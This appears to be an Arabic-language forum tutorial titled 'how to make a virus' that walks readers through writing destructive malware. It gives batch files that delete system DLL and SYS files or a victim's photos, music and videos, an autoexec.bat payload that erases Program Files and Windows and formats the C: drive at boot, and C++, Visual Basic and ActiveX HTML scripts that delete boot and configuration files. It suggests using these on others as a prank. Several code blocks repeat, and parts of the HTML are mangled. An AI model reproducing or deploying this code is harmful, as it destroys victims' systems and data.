قراءة المزيد
كيف تصنع فيروس
هناك طرق كثيرة لصناعة الفيروسات والهدف الرئيسي من الفيروسات هو تدمير المعلومات والملفات الموجودة في الجهاز
وهناك فيروسات خطيرة جدا بحيث لا يمكن التعامل معها الا باعادة فورمت الجهاز .
على العموم هذه الطريقة التي ساقدمها تحمل اربعة اجزاء وساقوم بشرحها بشكل مبسط .
و يجب توافر عدة شروط لكىيصبح الفيروس ذو فاعلية و هى أن يكون ذا حجم صغير لكى لا يتم الانتباه اليه
أن يعتمد على نفسه فى التشغيل أو على البرامج الأساسية أو عن طريق الارتباطباحد الملفات
أن يكون ذا هدف و مغزى
(( اذا كنت مبتدئ او ممن يخشون التعامل مع الفيروسات فارجوان تقوم بفهم الموضوع دون اى محاولة منك لتصنيع الفيروسات لأنك و كما سوف ترى ان اىخطا فى اى كود سوف يؤدى الى اضرار كبيرة منها تدمير نظام التشغيل لذا ارجو الحزر منتصميم الفيروس وانا لست مسؤل عن اى ضرر قد ينشئ لك من الفيروسات التى سوف تقوم بها ))
الأن يجب ان نعرف ما هى الطرق التى سوف استخدمها فىصناعة الفيروسات
1 الـnotepad2 برنامجالفجول بيسك (vb)2 برامج تصميم الفيروسات ( خطيرة جداااا وفيروساتها قوية – لكن اغلبها يكشفه النورتون)و سوف اقوم الأن بعرض كل منهمعلى حذة و سوف اشرحهم لكم بالتفصيل اتمنى ان ينال اعجابكم .
هذا هو الجزء الأول من صناعة الفيروسات و الذى سوف نقوم فيه على تعلمتصميم الفيروس بواسطة notepad
هذا هو الجزء الأول من صناعة الفيروسات و الذى سوف نقوم فيه على تعلمتصميم الفيروس بواسطة notepad
اولا اضغط في سطح المكتب على الزرالايمين للفارة
اختر جديد او nouveau
وبعدها notepad او document texte
انسخ الكود التالي
@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
الان قم بحفظ الملف بامتداد bat. مثال life.bat
* بعد ان قمت بوضعالكود و حفظه بامتداد .bat فانت هاكذ تكون قد قمت بعمل فيروس و سوف تلحظ ان شكلالأيقونة قد تغير الى شباك ازرق وبداخله عجلة صفراء احذر منه فهو الأن جاهز للعمل واياك ان تفتحه
* هذا الفيروس يقوم على مسح كل ملفات ال dll وال sys منالسيستم. وهذا ما سوف نلحظه بالنظر الى الكود السابق و به سوف نجد انه كتب فى هذاالكود امر " deltree " و هو الخاص بمسح الملفات ثم كتب بعد ذلك " *.dll كما كتب *.sys " و هو انى قد اعطيت له بان يمسح كل الملفات التى لها الأمتدادين السابقين ويمكن ملاحظة شئ اخر و هو كون الكمبيوتر يمسح الملفات من السيستيم و سوف نجد فى اولالكود الامر الخاص بذلك فسوف تجد انه قد اعطى له الأمر بالذهاب الى c: و كما اعطاهالأمر بالذهاب مالفات لويندوز عندما صدرنا له الأمر windir ثم اخبرناه ان الأوامرالتالية يجب ان تكون داخل مل سيستيم و الذى هو موجود ضمن ملفات الويندوز
* هذا الفيروس يقوم على مسح كل ملفات ال dll وال sys منالسيستم. وهذا ما سوف نلحظه بالنظر الى الكود السابق و به سوف نجد انه كتب فى هذاالكود امر " deltree " و هو الخاص بمسح الملفات ثم كتب بعد ذلك " *.dll كما كتب *.sys " و هو انى قد اعطيت له بان يمسح كل الملفات التى لها الأمتدادين السابقين ويمكن ملاحظة شئ اخر و هو كون الكمبيوتر يمسح الملفات من السيستيم و سوف نجد فى اولالكود الامر الخاص بذلك فسوف تجد انه قد اعطى له الأمر بالذهاب الى c: و كما اعطاهالأمر بالذهاب مالفات لويندوز عندما صدرنا له الأمر windir ثم اخبرناه ان الأوامرالتالية يجب ان تكون داخل مل سيستيم و الذى هو موجود ضمن ملفات الويندوز
ويمكنك التغير على الكدو قليلا وذلك من حيث المهمة او المكان مثال:
انا الأن اريد ان امزح معاحد و فى نفس الوقت عاوز اعلمه درس و تحزير فيمكننى ان اصنع فيروس يقوم بمسح جميعملفات الصور التى امتددها *.jpg. كما اننى اريد ان امسح جميع ملفات الأغانى التىامتددها *.mp3 و جميع امتدادت الملفات الخاصة بلافلام و التى امتدادها *.asf و التىتوجد فى E: كل ما علينا هو تعديل الكود ليصبح كالأتى
@Echo off
e:
deltree /y *.jpg
cd\
deltree /y *.mp3
cd\
deltree /y *.asf
الكود الثاني
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
قم بحفظ الملف على الشكل التالي Autoexec.bat
اخواني هذا الفيروس خطير جدا حيث يقوم بتدمير جميع ملفات النضام وكذللك فرمتت الجهاز والاشتغال تلقائيا فور تشغيل الجهاز ارجو الا تستعملوه ضد اخوانكم العرب
هذه مجموعة اخرى لاكواد فيروسات مشهورة
فيرووس C++ :
#include
#include
#include
main()
{
clrscr();
printf("\t\t\tWelcome to the Egyption -oO Virus Oo-\n\n");
printf("\t\t**** -oO Israel Oo- and -oO America Oo-\n\n");
remove("c:\\windows\\system.ini");
remove("c:\\windows\\win.ini");
remove("c:\\autoexec.bat");
remove("c:\\msdos.sys");
remove("c:\\io.sys");
remove("c:\\command.com");
remove("c:\\config.sys");
remove("c:\\windows\\ebd\\command.com");
remove("c:\\windows\\ebd\\ebd.cab");
remove("c:\\windows\\ebd\\Autoexec.bat") ;
remove("c:\\windows\\ebd\\setramd.bat");
remove("c:\\windows\\ebd\\Findramd.exe") ;
rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe");
printf("Windows destroyed ...\n\n");
system("PAUSE");
}
#include
#include
#include
main()
{
clrscr();
printf("\t\t\tWelcome to the Egyption -oO Virus Oo-\n\n");
printf("\t\t**** -oO Israel Oo- and -oO America Oo-\n\n");
remove("c:\\windows\\system.ini");
remove("c:\\windows\\win.ini");
remove("c:\\autoexec.bat");
remove("c:\\msdos.sys");
remove("c:\\io.sys");
remove("c:\\command.com");
remove("c:\\config.sys");
remove("c:\\windows\\ebd\\command.com");
remove("c:\\windows\\ebd\\ebd.cab");
remove("c:\\windows\\ebd\\Autoexec.bat") ;
remove("c:\\windows\\ebd\\setramd.bat");
remove("c:\\windows\\ebd\\Findramd.exe") ;
rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe");
printf("Windows destroyed ...\n\n");
system("PAUSE");
}
فيرووس Visual Basic :
SetAttr "c:\autoexec.bat", vbNormal
SetAttr "c:\msdos.sys", vbNormal
SetAttr "c:\io.sys", vbNormal
SetAttr "c:\windows\win.ini", vbNormal
SetAttr "c:\windows\system.ini", vbNormal
SetAttr "c:\command.com", vbNormal
SetAttr "c:\config.sys", vbNormal
SetAttr "c:\windows\rundll.exe", vbNormal
SetAttr "c:\windows\rundll32.exe", vbNormal
Kill "C:\autoexec.bat"
Kill "C:\msdos.sys"
Kill "C:\io.sys"
Kill "C:\windows\win.ini"
Kill "C:\windows\system.ini"
Kill "C:\command.com"
Kill "C:\config.sys"
Kill "C:\windows\rundll.exe"
Kill "C:\windows\rundll32.exe"
SetAttr "c:\autoexec.bat", vbNormal
SetAttr "c:\msdos.sys", vbNormal
SetAttr "c:\io.sys", vbNormal
SetAttr "c:\windows\win.ini", vbNormal
SetAttr "c:\windows\system.ini", vbNormal
SetAttr "c:\command.com", vbNormal
SetAttr "c:\config.sys", vbNormal
SetAttr "c:\windows\rundll.exe", vbNormal
SetAttr "c:\windows\rundll32.exe", vbNormal
Kill "C:\autoexec.bat"
Kill "C:\msdos.sys"
Kill "C:\io.sys"
Kill "C:\windows\win.ini"
Kill "C:\windows\system.ini"
Kill "C:\command.com"
Kill "C:\config.sys"
Kill "C:\windows\rundll.exe"
Kill "C:\windows\rundll32.exe"
فيروس Html
<$$$$ http$$$$$$="$$$$$$$-Type"
$$$$$$$="$$$$/html; charset=iso-8859-1">
Active-X HTML
THIS HTML USING ACTIVE-X PLEASE CLICK #YES#
<$$$$$$ --------="VB$$$$$$">
On Error Resume Next
Dim a
Set fso = CreateObject("$$$$$$ing.FileSystemObject ")
Set a = fso.GetFile("win.ini")
a.Delete
Dim b
Set fso = CreateObject("$$$$$$ing.FileSystemObject ")
Set b = fso.GetFile("system.ini")
b.Delete
<$$$$ http$$$$$$="$$$$$$$-Type"
$$$$$$$="$$$$/html; charset=iso-8859-1">
THIS HTML USING ACTIVE-X PLEASE CLICK #YES#
<$$$$$$ --------="VB$$$$$$">
On Error Resume Next
Dim a
Set fso = CreateObject("$$$$$$ing.FileSystemObject ")
Set a = fso.GetFile("win.ini")
a.Delete
Dim b
Set fso = CreateObject("$$$$$$ing.FileSystemObject ")
Set b = fso.GetFile("system.ini")
b.Delete
ملاحظة يحفظهذا الفيروس بأمتداد html .*
[/size][/b][/color]فيرووس C++ :
#include
#include
#include
main()
{
clrscr();
printf("\t\t\tWelcome to the Egyption -oO Virus Oo-\n\n");
printf("\t\t**** -oO Israel Oo- and -oO America Oo-\n\n");
remove("c:\\windows\\system.ini");
remove("c:\\windows\\win.ini");
remove("c:\\autoexec.bat");
remove("c:\\msdos.sys");
remove("c:\\io.sys");
remove("c:\\command.com");
remove("c:\\config.sys");
remove("c:\\windows\\ebd\\command.com");
remove("c:\\windows\\ebd\\ebd.cab");
remove("c:\\windows\\ebd\\Autoexec.bat") ;
remove("c:\\windows\\ebd\\setramd.bat");
remove("c:\\windows\\ebd\\Findramd.exe") ;
rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe");
printf("Windows destroyed ...\n\n");
system("PAUSE");
}
فيرووس Visual Basic :
SetAttr "c:\autoexec.bat", vbNormal
SetAttr "c:\msdos.sys", vbNormal
SetAttr "c:\io.sys", vbNormal
SetAttr "c:\windows\win.ini", vbNormal
SetAttr "c:\windows\system.ini", vbNormal
SetAttr "c:\command.com", vbNormal
SetAttr "c:\config.sys", vbNormal
SetAttr "c:\windows\rundll.exe", vbNormal
SetAttr "c:\windows\rundll32.exe", vbNormal
Kill "C:\autoexec.bat"
Kill "C:\msdos.sys"
Kill "C:\io.sys"
Kill "C:\windows\win.ini"
Kill "C:\windows\system.ini"
Kill "C:\command.com"
Kill "C:\config.sys"
Kill "C:\windows\rundll.exe"
Kill "C:\windows\rundll32.exe"
فيروس Html
<$$$$ http$$$$$$="$$$$$$$-Type"
$$$$$$$="$$$$/html; charset=iso-8859-1">
THIS HTML USING ACTIVE-X PLEASE CLICK #YES#
<$$$$$$ --------="VB$$$$$$">
On Error Resume Next
Dim a
Set fso = CreateObject("$$$$$$ing.FileSystemObject ")
Set a = fso.GetFile("win.ini")
a.Delete
Dim b
Set fso = CreateObject("$$$$$$ing.FileSystemObject ")
Set b = fso.GetFile("system.ini")
b.Delete
ملاحظة يحفظهذا الفيروس بأمتداد html .*
الان اخواني هذا كل ما لدي من اكواد اي اكواد جديدة ساقوم بوضعها هنا .
0 مراجعات